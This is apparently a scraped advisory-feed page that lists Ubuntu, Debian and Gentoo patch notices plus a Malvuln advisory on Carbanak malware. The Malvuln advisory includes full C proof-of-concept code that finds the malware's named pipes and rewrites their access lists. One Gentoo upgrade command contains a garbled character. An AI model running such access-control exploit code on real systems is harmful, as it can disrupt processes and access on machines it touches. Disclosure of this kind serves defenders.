Ubuntu Security Notice 6579-2 - USN-6579-1 fixed a vulnerability in Xerces-C++. This update provides the corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.04 and Ubuntu 23.10. It was discovered that Xerces-C++ was not properly handling memory management operations when parsing XML data containing external DTDs, which could trigger a use-after-free error. If a user or automated system were tricked into processing a specially crafted XML document, an attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6579-2  
January 16, 2024

xerces-c vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS

Summary:

Xerces-C++ could be made to crash or run programs if it opened a specially  
crafted file.

Software Description:  
- xerces-c: Validating XML parser written in a portable subset of C++

Details:

USN-6579-1 fixed a vulnerability in Xerces-C++. This update provides the  
corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.04  
and Ubuntu 23.10.

Original advisory details:

It was discovered that Xerces-C++ was not properly handling memory  
management operations when parsing XML data containing external DTDs,  
which could trigger a use-after-free error. If a user or automated system  
were tricked into processing a specially crafted XML document, an attacker  
could possibly use this issue to cause a denial of service or execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
libxerces-c-samples 3.2.4+debian-1ubuntu0.23.10.1  
libxerces-c3.2 3.2.4+debian-1ubuntu0.23.10.1

Ubuntu 23.04:  
libxerces-c-samples 3.2.4+debian-1ubuntu0.23.04.1  
libxerces-c3.2 3.2.4+debian-1ubuntu0.23.04.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
libxerces-c-samples 3.2.3+debian-3ubuntu0.1~esm1  
libxerces-c3.2 3.2.3+debian-3ubuntu0.1~esm1

Ubuntu 20.04 LTS:  
libxerces-c-samples 3.2.2+debian-1ubuntu0.1  
libxerces-c3.2 3.2.2+debian-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6579-2  
https://ubuntu.com/security/notices/USN-6579-1  
CVE-2018-1311

Package Information:  
https://launchpad.net/ubuntu/+source/xerces-c/3.2.4+debian-1ubuntu0.23.10.1  
https://launchpad.net/ubuntu/+source/xerces-c/3.2.4+debian-1ubuntu0.23.04.1  
https://launchpad.net/ubuntu/+source/xerces-c/3.2.2+debian-1ubuntu0.1

Ubuntu Security Notice USN-6579-2

Debian Linux Security Advisory 5598-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5598-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJanuary 10, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-0333A security issue was discovered in Chromium, which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the oldstable distribution (bullseye), this problem has been fixedin version 120.0.6099.216-1~deb11u1. Note that chromium security supportfor the oldstable distribution is ending, and this is likely to be thelast release for it.For the stable distribution (bookworm), this problem has been fixed inversion 120.0.6099.216-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWe960ACgkQZF0CR8Nudjcx9Q//WvdPeou8hwSfeR7U6+5+WRW907xxrPCGebZi0d2LW0V3HYB0uIRAxPXjffZz0f3bgbEk81GDgNWXh91xaP7jmwJqvUT/vB4yhUZmEOBmn+svqUgLi973tab1naj91M01C04iQyqlbzjOQXiEFc6MFh9FDbUbmFX1lYByzQHOLcMD3VyPtdnBAJY9o+/6Aoz51bDaJbbV1I231aafG1wfcz5CSuNKpzDGzqeOyI4D0tChSfJN4NnjeQtNWnIzUP9ouQhcxkLAk5ToQmh7Xh/HT9bfgGeTiF283/Pz/ky2uM1A6J5x+Kt1OocwCinaXR0wLYl7LmhNcp/y2Nj+5XsjI2cutTAUfMQ75lsxoFgIzaoeoY1KgdiEbRZa3i6RzB7Nng7bFkp6Dn8PJDicr4+NGCcOIvYHDSu5lqj0vlE5b/LX1ghNzmYYmB/1FsafxYBAOctPwhW9DPNZJMRptWKoF1k3hn7J8PaMMLHgHHwsZdvDcSNoA5t9VL8/fLmC6U2fKsPliscUFTrmQiUNYorDn7KOJsdzMnxld02+YACYEvQg6wQXCB/Yhur9mRm7wK0CXnPKi8qdqDUgmmVXjJATEkEAnqENKvy15MCGgt1JZnDQd2eqRU4B4/Ui1Yic5sBt2Mfbwo1jxPj3aaCE/bW0ykqvXpN0/GyJsYeylKBC8XI==wTxO-----END PGP SIGNATURE-----

Debian Security Advisory 5598-1

Ubuntu Security Notice 6579-1 - It was discovered that Xerces-C++ was not properly handling memory management operations when parsing XML data containing external DTDs, which could trigger a use-after-free error. If a user or automated system were tricked into processing a specially crafted XML document, an attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6579-1  
January 11, 2024

xerces-c vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Xerces-C++ could be made to crash or run programs if it opened a specially  
crafted file.

Software Description:  
- xerces-c: Validating XML parser written in a portable subset of C++

Details:

It was discovered that Xerces-C++ was not properly handling memory  
management operations when parsing XML data containing external DTDs,  
which could trigger a use-after-free error. If a user or automated system  
were tricked into processing a specially crafted XML document, an attacker  
could possibly use this issue to cause a denial of service or execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
libxerces-c-samples 3.2.0+debian-2ubuntu0.1~esm2  
libxerces-c3.2 3.2.0+debian-2ubuntu0.1~esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
libxerces-c-samples 3.1.3+debian-1ubuntu0.1~esm2  
libxerces-c3.1 3.1.3+debian-1ubuntu0.1~esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
libxerces-c-samples 3.1.1-5.1+deb8u4ubuntu0.1~esm1  
libxerces-c3.1 3.1.1-5.1+deb8u4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6579-1  
CVE-2018-1311

Ubuntu Security Notice USN-6579-1

Backdoor.Win32 Carbanak (Anunak) malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32 Carbanak (Anunak)Vulnerability: Named Pipe Null DACLFamily: CarbanakType: PE32MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1Vuln ID: MVID-2024-0667Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.binDisclosure: 01/09/2024Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent processand last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.Successfully tested in VM environment.Carbanak IPC Named Pipes:\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb   RW Everyone\\.\Pipe\tGYNSgZvVXwumEhdcF    RW Everyone\\.\Pipe\JFNfVUYDXmlZQVI   <=====  ALWAYS CREATED  RW Everyone\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX  RW Everyone\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD  RW Everyone\\.\Pipe\iDToHxpSCbEIEHPBeQ  RW Everyone\\.\Pipe\YutsGUYwwUusszByeuXUQK  RW Everyone\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe  RW EveryoneExploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13DACL IPC named pipes created and grants RW access for Everyone.We can identify Carbanak as out of the eight pipes it creates with random names the pipenamed JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are createdat same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created afterOutput named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.Successfully tested in VM environment.By Malvuln**//** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"#define MAX_TOKENS 1024#define DELIMITER "\n"int str2Array(char*** argv, char *str);int Exploit(char *carbanak_pipe);int str2Array(char*** argv, char *str){char* buffer;int argc;buffer = (char *) malloc(strlen(str) * sizeof(char));strcpy(buffer, str);(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));  argc = 0;    (*argv)[argc++] = strtok(buffer, DELIMITER);  while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&   (argc < MAX_TOKENS)) ++argc;return argc;}int main(void){system("dir /b \\\\.\\pipe\\\\ > tmp.sys");int ch;char tmp[1];FILE *fp = fopen("tmp.sys", "r");fseek(fp, 0, SEEK_END);int bytes = ftell(fp) + 256;rewind(fp);char x[bytes]; while((ch = fgetc(fp)) != EOF){      if(feof(fp)){      break;     }    sprintf(tmp, "%c", ch);    strcat(x, tmp);}fclose(fp);char **A;int i, result = str2Array(&A, x);int delay = 300;int rc;BOOL infected=FALSE;for(i=0;i<result;i++){    if(strcmp(A[i], CARBANAK_PIPE)==0){    printf("[+] Carbanak (Anunak) malware IPC exploit\n");    printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");    printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");    printf("[+] Attack started...\n\n");        infected = TRUE;    Exploit(A[i]);    Sleep(delay);        Exploit(A[i-2]);    Sleep(delay);    Exploit(A[i-1]);    Sleep(delay);     Exploit(A[i+1]);    Sleep(delay);        Exploit(A[i+2]);    Sleep(delay);      Exploit(A[i+3]);    Sleep(delay);      Exploit(A[i+4]);    Sleep(delay);          rc = Exploit(A[i+5]);  }}    if(!infected){       printf("[+] Carbanak (Anunak) malware IPC Exploit \n");     printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");     printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");     printf("[!] Aborting...");    }    if(rc==0){      printf("\n[!] Done!");          }  printf("\n[+] By Malvuln circa 2024\n\n");  system("pause");  return 0;}int Exploit(char *malpipe){      char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";    strcat(MALPIPE_PREFIX, malpipe);    HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);            PACL pOldDACL = NULL;    PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){        int rc = GetLastError();      if(rc==5){       printf("[!] Access Denied for pipe: %s\n", malpipe);       }             return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){     printf("[!] Error: %d",  GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){       printf("[!] Error: %d",  GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("[!] Error: %d",  GetLastError());       return 1;           }else{       printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);      }        LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);        return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL

Gentoo Linux Security Advisory 202401-7 - A vulnerability was found in R which could allow for remote code execution. Versions greater than or equal to 4.0.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: R: Directory Traversal  
     Date: January 06, 2024  
     Bugs: #765361  
       ID: 202401-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability was found in R which could allow for remote code  
execution.

Background  
==========

R is a language and environment for statistical computing and graphics.

Affected packages  
=================

Package     Vulnerable    Unaffected  
----------  ------------  ------------  
dev-lang/R  < 4.0.4       >= 4.0.4

Description  
===========

The native R package installation mechanisms do not sufficiently  
validate installed source packages for path traversal.

Impact  
======

Installation of a malicious R package could result in an arbitrary file  
overwrite which could result in arbitrary code execution, as might be  
seen with the overwrite of an authorized_keys file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All R users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-lang/R-4.0.4"

References  
==========

[ 1 ] CVE-2020-27637  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27637  
[ 2 ] -fno-common  
[ 3 ] gcc-10

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-07

Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5596-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
January 04, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : asterisk  
CVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786  
Debian Bug     : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open  
Source Private Branch Exchange.

CVE-2023-37457

    The 'update' functionality of the PJSIP_HEADER dialplan function can exceed  
    the available buffer space for storing the new value of a header. By doing  
    so this can overwrite memory or cause a crash. This is not externally  
    exploitable, unless dialplan is explicitly written to update a header based  
    on data from an outside source. If the 'update' functionality is not used  
    the vulnerability does not occur.

CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in  
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a  
    higher level media transport which is stacked upon a lower level media  
    transport such as UDP and ICE. Currently a higher level transport is not  
    synchronized with its lower level transport that may introduce a  
    use-after-free issue. This vulnerability affects applications that have  
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media  
    transport other than UDP. This vulnerability’s impact may range from  
    unexpected application termination to control flow hijack/memory  
    corruption.

CVE-2023-49294

    It is possible to read any arbitrary file even when the `live_dangerously`  
    option is not enabled.

CVE-2023-49786

   Asterisk is susceptible to a DoS due to a race condition in the hello  
   handshake phase of the DTLS protocol when handling DTLS-SRTP for media  
   setup. This attack can be done continuously, thus denying new DTLS-SRTP  
   encrypted calls during the attack. Abuse of this vulnerability may lead to  
   a massive Denial of Service on vulnerable Asterisk servers for calls that  
   rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F  
Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl  
AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b  
zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk  
T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb  
bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu  
mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh  
bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ  
Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+  
sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU  
+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5596-1

Debian Linux Security Advisory 5593-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5593-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 01, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-6531 CVE-2023-6622 CVE-2023-6817 CVE-2023-6931  
                 CVE-2023-51779 CVE-2023-51780 CVE-2023-51781 CVE-2023-51782

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-6531

    Jann Horn discovered a use-after-free flaw due to a race condition  
    problem when the unix garbage collector's deletion of a SKB races  
    with unix_stream_read_generic() on the socket that the SKB is  
    queued on.

CVE-2023-6622

    Xingyuan Mo discovered a flaw in the netfilter subsystem which may  
    result in denial of service or privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6817

    Xingyuan Mo discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6931

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system which may result in  
    denial of service or privilege escalation.

CVE-2023-51779

    It was discovered that a race condition in the Bluetooth subsystem  
    in the bt_sock_ioctl handling may lead to a use-after-free.

CVE-2023-51780

    It was discovered that a race condition in the ATM (Asynchronous  
    Transfer Mode) subsystem may lead to a use-after-free.

CVE-2023-51781

    It was discovered that a race condition in the Appletalk subsystem  
    may lead to a use-after-free.

CVE-2023-51782

    It was discovered that a race condition in the Amateur Radio X.25  
    PLP (Rose) support may lead to a use-after-free.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.69-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWSuDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q7/g//Ski3EY0dL0SNhIWCSVOA01f4rZbW8e+65GpQofJtckBb2Wk1ZyMb+eLv  
U5aRfscn7DC2J0BiX+/JjaboTx880WcUQw5csbSzb2bEGhsHBwHkCG31qaTs5ekG  
XH654gBja/FmGZOvQ+YwoglDMCbCiSrUs7fwe3kPhlr3XRHs2ZdezKrOQ3m2bo7g  
xnA7UwB+5xwbbnweYkmKxtowM+x4XUDsr43/YR+mbeULzprGQGbyxsi8txKJQ8d+  
xqyxCl5zki3dF/baBhBLPMH26GUs6fGsplhht9ecUcKXiNeyYLBX6Aepb4YDEgKN  
o0tBDPVundFPxyQzr8qMfdB0w6+4U2z+QavV/OCziNIKXbnrNUMpjF6Pks+geneY  
R+ut1KWHVkOJsAgI3mGrLd+tjPSEsdUB2EJhlFWpF9XJnBD3KV9xPVOBN3ZjL1+o  
t/ow/5XV+LZTihUQ37stcJRnl5U1CGWlBWbUonc++eGbCAvFNaV6gTfADWyz+/6W  
z5eKFZpj678AFr5RbkgF2earJUT0iC3vgtKMTiEsxNoRMZgVOu8iiekX+gpWBkdt  
2w+dAAu8VFixQ5/Sl8LDYCFkP8xrtf31XiNBsrMZzxJDfMtNYMi++iQXSW8LyoL/  
JqbEQibQU57ls29SbvoweKCnK1GgBfhrqqGAk7/Pnax0yuK4z4M=9GI7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5593-1

Gentoo Linux Security Advisory 202312-7 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.11_p20231120 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtWebEngine: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #913050, #915465  
       ID: 202312-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in QtWebEngine, the worst  
of which could lead to remote code execution.

Background  
=========  
QtWebEngine is a library for rendering dynamic web content in Qt5 and  
Qt6 C++ and QML applications.

Affected packages  
================  
Package             Vulnerable           Unaffected  
------------------  -------------------  --------------------  
dev-qt/qtwebengine  < 5.15.11_p20231120  >= 5.15.11_p20231120

Description  
==========  
Multiple vulnerabilities have been discovered in QtWebEngine. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QtWebEngine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.11_p20231120"

References  
=========  
[ 1 ] CVE-2023-4068  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4068  
[ 2 ] CVE-2023-4069  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4069  
[ 3 ] CVE-2023-4070  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4070  
[ 4 ] CVE-2023-4071  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4071  
[ 5 ] CVE-2023-4072  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4072  
[ 6 ] CVE-2023-4073  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4073  
[ 7 ] CVE-2023-4074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4074  
[ 8 ] CVE-2023-4075  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4075  
[ 9 ] CVE-2023-4076  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4076  
[ 10 ] CVE-2023-4077  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4077  
[ 11 ] CVE-2023-4078  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4078  
[ 12 ] CVE-2023-4761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4761  
[ 13 ] CVE-2023-4762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4762  
[ 14 ] CVE-2023-4763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4763  
[ 15 ] CVE-2023-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4764  
[ 16 ] CVE-2023-5218  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5218  
[ 17 ] CVE-2023-5473  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5473  
[ 18 ] CVE-2023-5474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5474  
[ 19 ] CVE-2023-5475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5475  
[ 20 ] CVE-2023-5476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5476  
[ 21 ] CVE-2023-5477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5477  
[ 22 ] CVE-2023-5478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5478  
[ 23 ] CVE-2023-5479  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5479  
[ 24 ] CVE-2023-5480  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5480  
[ 25 ] CVE-2023-5481  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5481  
[ 26 ] CVE-2023-5482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5482  
[ 27 ] CVE-2023-5483  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5483  
[ 28 ] CVE-2023-5484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5484  
[ 29 ] CVE-2023-5485  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5485  
[ 30 ] CVE-2023-5486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5486  
[ 31 ] CVE-2023-5487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5487  
[ 32 ] CVE-2023-5849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5849  
[ 33 ] CVE-2023-5850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5850  
[ 34 ] CVE-2023-5851  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5851  
[ 35 ] CVE-2023-5852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5852  
[ 36 ] CVE-2023-5853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5853  
[ 37 ] CVE-2023-5854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5854  
[ 38 ] CVE-2023-5855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5855  
[ 39 ] CVE-2023-5856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5856  
